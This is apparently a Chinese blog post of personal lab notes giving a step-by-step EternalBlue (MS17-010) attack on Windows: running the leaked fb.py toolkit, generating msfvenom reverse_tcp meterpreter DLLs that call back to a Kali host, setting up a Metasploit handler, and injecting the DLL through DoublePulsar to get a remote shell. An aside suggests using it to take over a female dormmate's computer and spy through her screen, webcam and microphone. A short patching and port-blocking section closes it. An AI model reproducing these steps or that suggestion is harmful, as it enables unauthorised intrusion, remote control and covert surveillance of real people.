微软EternalBlue永恒之蓝漏洞攻击测试

简介: 版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396256 声明:仅供学习交流使用,个人实验笔记。
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396256

声明:仅供学习交流使用,个人实验笔记。排版比较懒。

微软MS17-010
理论:SMBv1 漏洞攻击,445端口。

环境准备:

攻击资源:攻击工具包 点我
攻击者系统:Windows 7 Ultimate (x64) 点我
受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我
辅助攻击用系统:kali 点我
推荐虚拟环境构建工具:vmware workstation或oracle Vbox工具下载

操作:

1、攻击者环境部署(确保路径全英文):
虚拟机部署win7 64位环境,要么都桥接,要么都选择自定义网络。
下载python2.6并安装点我
下载pywin32并安装,一定要注意,下载对应python版本点我
将C:\Python26添加到环境变量PATH中。
将攻击工具包拖入虚拟机,或上传到虚拟机。解压后,里面有个Windows的目录,复制出来到虚拟机的c盘。
新建 listeningposts 目录。

2、受害者环境部署:

受害者系统自选一个就行,随意,安装后,需要和攻击者系统能互相ping通。

3、攻击操作:

攻击者在cmd下运行fb.py
target IP就是受害者IP
callbackIP就是攻击者的IP
USE redirection输入NO
base log 输入 c:\logs或输入NO(是否有日志记录,这个是自愿)
接着输入0,新建了一个攻击项目。
项目名称随意(英文以外名字可能会报错)。
然后输入yes确认
其他的直接回车就行了。英文可以用有道翻译。
use EternalBlue
问你是否要setting。输入yes
下面的回车就好,都是默认好的配置。
target system,如实选择受害者的系统。
mode选择fb,即输入1。
剩下的就是yes和回车了。
当出现success关键词的时候,说明攻击第一步已经完成了。
(失败的原因:
1、防火墙的保护。
2、杀毒程序的保护。
3、网络通信异常。
4、人为操作失误。)

部署辅助攻击系统:

1、部署kali,可以和攻击者正常通信即可。
2、攻击者安装xshell。
3、通过xshell ssh到kali即可。(百度关键词,kali开启和配置ssh服务)
4、利用kali 的msf生成后门文件。(LPORT端口参数随意,只要不冲突就行)
如果受害者是winXP 32位:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali系统的ip LPORT=19999 -f dll > /tmp/attack.dll
如果受害者是win7 64位:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=5555 -f dll > /tmp/attack.dll
确认xshell已经连接到了kali,
在xshell输入:sz /opt/attack.dll 
选择保存在攻击者系统的c盘根目录下即可。
xshell下:
msfconsole
use exploit/multi/handler //启用了监听模块
受害者是winXP的时候:
( set payload windows/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT  19999  
show options  //看一眼配置
run //开启了监听
)
受害者是win7 64位时:
(
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost kali的ip
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit
)

在攻击者的cmd下:
use Doublepulsar
操作系统选择目标的。
选择RunDLL
路径输入:c:\attack.dll
其他各种回车确认。
可以看到,xshell连接的kali,收到了会话连接。
可以输入whoami或者dir来验证一下。

其他资源(感觉部署环境好麻烦,想来点现成的):

在线现成的环境操作实战:点我在线实战
kali下直接实现攻击利用:http://www.jianshu.com/p/f770d0bbed77

杂谈

一般情况,女生的电脑如果和你在一个网络,比如你们宿舍之间,没有做严格的隔离,那么,理论上讲,可以完整的控制她的电脑,除非她安装了360,为何不说她安装了腾讯管家。因为,对付一些漏洞,需要足够的浪才可以,管家还是太文绉绉了。
(不仅可以截屏,还可以看摄像头,还有录音。另:现网实战前,请阅读:https://www.ishuo.cn/doc/mzlpnnqf.html

预防和其他参考:

360提供了懒人模式的NSA攻击自动检测和防护工具,免安装。点我
使用防火墙过滤/关闭 137、139、445端口。
对于 3389 远程登录,如果不想关闭的话,至少要关闭智能卡登录功能。
安装微软补丁:请前往微软官方网站下载与自己操作系统匹配的安全补丁进行更新
MS08-067:https://technet.microsoft.com/zh-cn/library/security/ms08-067.aspx
MS09-050:https://technet.microsoft.com/library/security/ms09-050
MS10-061:https://technet.microsoft.com/zh-cn/library/security/ms10-061.aspx
MS14-068:https://technet.microsoft.com/library/security/MS14-068
MS17-010:https://technet.microsoft.com/zh-cn/library/security/MS17-010

相关文章
|
2月前
|
SQL 存储 数据库
Python 的安全性和测试:什么是 SQL 注入攻击?如何防范 SQL 注入?
Python 的安全性和测试:什么是 SQL 注入攻击?如何防范 SQL 注入?
|
2月前
|
SQL 安全 关系型数据库
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞,品相还不错,可执行任意 SQL 语句。 总之,吃了一惊,一个防 SQL 注入的工具居然也有 SQL 注入漏洞。 请看这段代码
495 3
|
2月前
|
安全 数据管理 测试技术
网络安全与信息安全:防范漏洞、加强加密与提升安全意识深入探索自动化测试框架的设计原则与实践应用化测试解决方案。文章不仅涵盖了框架选择的标准,还详细阐述了如何根据项目需求定制测试流程,以及如何利用持续集成工具实现测试的自动触发和结果反馈。最后,文中还将讨论测试数据管理、测试用例优化及团队协作等关键问题,为读者提供全面的自动化测试框架设计与实施指南。
【5月更文挑战第27天】 在数字化时代,网络安全与信息安全已成为维护国家安全、企业利益和个人隐私的重要环节。本文旨在分享关于网络安全漏洞的识别与防范、加密技术的应用以及提升安全意识的重要性。通过对这些方面的深入探讨,我们希望能为读者提供一些实用的建议和策略,以应对日益严峻的网络安全挑战。 【5月更文挑战第27天】 在软件开发周期中,自动化测试作为保障软件质量的关键步骤,其重要性日益凸显。本文旨在剖析自动化测试框架设计的核心原则,并结合具体案例探讨其在实际应用中的执行策略。通过对比分析不同测试框架的优缺点,我们提出一套高效、可扩展且易于维护的自动
|
2月前
|
开发框架 JSON .NET
初学者不会写接口怎么办?微软Visual Studio 2022无脑式API接口创建——Swagger一键导入APIKit快速测试
初学者不会写接口怎么办?微软Visual Studio 2022无脑式API接口创建——Swagger一键导入APIKit快速测试
175 0
|
2月前
|
安全 JavaScript 前端开发
Python 的安全性和测试:解释什么是 XSS 和 CSRF 攻击?在 Python 中如何防范这些攻击?
Python 的安全性和测试:解释什么是 XSS 和 CSRF 攻击?在 Python 中如何防范这些攻击?
|
7月前
|
SQL 安全 网络安全
【Web渗透测试】—Web漏洞
【Web渗透测试】—Web漏洞
|
7月前
|
监控 安全 算法
漏洞测试与防护:监控局域网络的软件实用指南(Swift)
在当今数字时代,使用监控局域网络的软件维护网络安全至关重要。为了保护局域网络免受潜在威胁,漏洞测试和防护措施是必不可少的。本文将介绍一种基于Swift编程语言的软件实用指南,帮助您监控局域网络并加强安全性。
221 0
|
8月前
|
安全 Shell Windows
#windowsxpsp3系统MS08-067漏洞测试
#windowsxpsp3系统MS08-067漏洞测试
40 0
|
8月前
|
安全 网络协议 Shell
#windowsxpsp3系统MS10-046漏洞测试
#windowsxpsp3系统MS10-046漏洞测试
48 0
|
14天前
|
JSON JavaScript 测试技术
Postman接口测试工具详解
Postman接口测试工具详解
25 1